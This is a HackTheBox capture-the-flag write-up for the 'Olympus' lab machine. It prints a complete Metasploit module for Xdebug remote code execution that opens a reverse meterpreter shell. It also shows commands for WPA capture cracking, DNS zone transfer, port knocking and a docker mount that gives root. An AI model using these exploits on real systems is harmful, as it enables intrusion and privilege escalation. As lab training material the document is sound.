HackTheBox Writeup — Olympus
Hello Guys , I am Faisal Husaini and this is my writeup on Medium for Olympus machine which has retired and also this was my favorite box on HTB. My username on HTB is “faisalelino” .
This writeup is on Olympus box which is one of the hardest box on HTB. But the experience was great while solving this machine as I learned about alot of stuffs while solving this machine.
The IP for this machine is 10.10.10.83, so let’s get started
NMAP Results
First we do nmap scan using the command “nmap -sC -sV -oA nmap 10.10.10.83”
# Nmap 7.70 scan initiated Sun Jun 10 02:19:00 2018 as: nmap -sC -sV -oA nmap 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.19s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Crete island — Olympus HTB
85/tcp filtered mit-ml-dev
144/tcp filtered news
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
| 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
4004/tcp filtered pxc-roid
9040/tcp filtered tor-trans
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D7C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,”\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c”);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D77%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,”SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\r\n”);Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 10 02:20:18 2018–1 IP address (1 host up) scanned in 78.87 seconds
We see port 22 for ssh is filtered , also port 80 is open , so lets open the IP in browser
HTTP Service
Nothing interesting here………. Let’s look at the source code too
We see here nothing much important in the http , neither we got something from its source code , so its time for dirb scan
Dirb
We dont get anything much of use from dirb , so its time to run nikto on http://10.10.10.83/
Nikto
Nikto says uncommon header ‘xdebug’ found , so now lets google about it
XDebug
As this was given about xdebug on its official website , so lets find for its exploit if any
MSF Exploit for XDebug on Exploit-DB by MinatoTW
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘xdebug Unauthenticated OS Command Execution’,
‘Description’ => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
‘DisclosureDate’ => ‘Sep 17 2017’,
‘Author’ => [
‘Ricter Zheng’, #Discovery https://twitter.com/RicterZ
‘Taki Tachibana’, # MinatoTW
‘Mumbai’ # Austin Hudson
],
‘References’ => [
[‘URL’, ‘https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
[‘URL’, ‘https://paper.seebug.org/397/']
],
‘License’ => MSF_LICENSE,
‘Platform’ => ‘php’,
‘Arch’ => [ARCH_PHP],
‘DefaultTarget’ => 0,
‘Stance’ => Msf::Exploit::Stance::Aggressive,
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘php/meterpreter/reverse_tcp’
},
‘Payload’ => {
‘DisableNops’ => true,
},
‘Targets’ => [[ ‘Automatic’, {} ]],
))
register_options([
OptString.new(‘PATH’, [ true, “Path to target webapp”, “/index.php”]),
OptAddress.new(‘SRVHOST’, [ true, “Callback host for accepting connections”, “0.0.0.0”]),
OptInt.new(‘SRVPORT’, [true, “Port to listen for the debugger”, 9000]),
Opt::RPORT(80),
OptString.new(‘WriteableDir’, [ true, “A writeable directory on the target”, “/tmp”])
])
end
def check
begin
res = send_request_cgi({
‘uri’ => datastore[“PATH”],
‘method’ => ‘GET’,
‘vars_get’ => {
‘XDEBUG_SESSION_START’ => rand_text_alphanumeric(10)
}
})
vprint_status “Request sent\n#{res.headers}”
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good(“Looks like remote server has xdebug enabled\n”)
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end
def exploit
payl = Rex::Text.encode_base64(“#{payload.encoded}”)
file = “#{datastore[‘WriteableDir’]}”+”/”+rand_text_alphanumeric(5)
cmd1 = “eval -i 1 — “ + Rex::Text.encode_base64(“file_put_contents(\”#{file}\”,base64_decode(\”#{payl}\”)) && system(\” php #{file} \”)”) + “\x00”
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
‘LocalPort’ => datastore[‘SRVPORT’],
‘LocalHost’ => datastore[‘SRVHOST’],
‘Context’ => {
‘Msf’ => framework,
‘MsfExploit’ => self
})
client = server.accept
print_status(“Waiting for client response.”)
data = client.recv(1024)
print_status(“Receiving response”)
vprint_line(data)
print_status(“Shell might take upto a minute to respond.Please be patient.”)
print_status(“Sending payload of size #{cmd1.length} bytes”)
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
‘uri’ => datastore[‘PATH’],
‘method’ => ‘GET’,
‘headers’ => {
‘X-Forwarded-For’ => “#{lhost}”,
‘Cookie’ => ‘XDEBUG_SESSION=’+rand_text_alphanumeric(10)
}
})
end
end
Exploting XDebug using MSFConsole
We have to set RHOST which is 10.10.10.83 and LHOST to our tun0 IP address and then run the exploit command
Bingo.!! We got meterpreter , now lets move on and see the contents
Diging into Meterpreter
Nothing much here , lets see the contents of Zeus user
We see something much like git folders , airgeddon.sh , a folder name captured etc..
Let’s see the contents of airgeddon.sh , we see that its very length bash script code , so nothing interesting there , now let’s dive to captured folder
We got a .cap file , we download it using our meterpreter shell.
Now lets crack this captured.cap file using aircrack
Cracking CAP file using Aircrack-ng
We crack the captured.cap file using the tool aircrack-ng
Command Used : aircrack-ng captured.cap -w rockyou.txt , and then we wait for the cracking to get finished
We got the key , which is “flightoficarus”
This was bit tricky to understand , then I came to know the word Icarus seems to be like greek which this box is based on , and that also from
nmap results we saw that ssh is open on port 2222 , so Icarus maybe the username , but what about password?
After asking a hint from my friend , he told me to see the captured.cap file , so i thought that the word “captured” maybe the password , but no..!!
Then Iopened the captured.cap file using Wireshark
Opening captured.cap file using Wireshark
We see something as a sentence , that maybe the password , so the sentence was like “Too_cl0se_to_th3_Sun” , now we copy this and connect to ssh
Connecting to SSH on Port 2222
We connect to ssh using this command:
ssh icarus@10.10.10.83 -p2222
Bingo we got in to ssh , lets see whats inside the home folder by “ls” command
We see a txt file name help_of_the_gods.txt and inside it we got a dns , so i will copy it to my /etc/hosts file with the IP of 10.10.10.83
DIG
I tried alot of things , which when doing ctfolympus.htb on the browser , it was displaying the same thing as when we were doing using the IP
So after talking a help from my friend , he told me to use dig
So Iused dig with “dig axfr ctfolympus.htb @10.10.10.83” , we get
In the txt area we see “St34l_th3_F1re!” which was similar to the password style for Icarus we got from captured.cap
But what about username , we see that “prometheus” from the same txt area , but when we tried it on port 2222 of ssh , it failed to connect
Also port 22 was filtered , then I didnt knew about port knocking , which my friend gave me help by saying to watch Ippsec’s Nineveh video
So from that Ilearn about port knocking and now we got to that part
Port Knocking
I create a simple bash command for the port knocking
After watching the nineveh video from Ippsec , I saw that he used 3 ports from iptables or something , which I didn’t had in this box
So what to do????
Remember the txt area we got from dig , I said portal to Hades and then was 3 numbers
These are the 3 ports to be used for port knocking , i.e, 3456 , 8234, 62431
So I used this command for knocking and also directly connect to ssh on port 22
for i in 3456 8234 62431; do nmap -Pn -p $i — host-timeout 201 — max-retries 0 10.10.10.83; done; ssh prometheus@10.10.10.83
Now it connects to ssh without saying the port being filtered , now we enter the password which was “St34l_th3_F1re!”
And we get in , now lets get the user flag
User Flag
User flag was in the same directory , so when we do the ls command and then cat “user.txt” , we get the flag
Bingo , now time for root
Privelege Escalation
Lets import the LinEnum.sh script from my local machine and then run and see the results
We were not able to run sudo command as prometheus , so after the script execution complete , we saw only 1 thing interesting
The user was hosting docker , which maybe a hint to docker privilege escalation , so after searching on google for docker privilege escalation , I got
docker run [tab tab] to see the images
docker run -t -i olympia /bin/bash
docker run -v /root:/root -i -t olympia /bin/bash
So Iran the last command and then got the root flag
We got root , now its time to get root flag which is located in /root/root.txt
Remember the 3 commands for docker which Igave above , use the 3rd one to get the flag
Root Flag
This machine was really very awesome and I gained alot of knowledge from it like Port Knocking , Docker Priv Esc etc.
Vulnerabilities Used To Solve This Box:-
- XDebug Exploitation
- Zone Transfers
- Port Knocking
- Docker Privelege Escalation
References
XDebug Exploit by MinatoTW on HTB → https://www.exploit-db.com/exploits/44568/
Ippsec’s Nineveh Video for Port Knocking → https://www.youtube.com/watch?v=K9DKULxSBK4
Docker Privelege Escalation → https://fosterelli.co/privilege-escalation-via-docker.html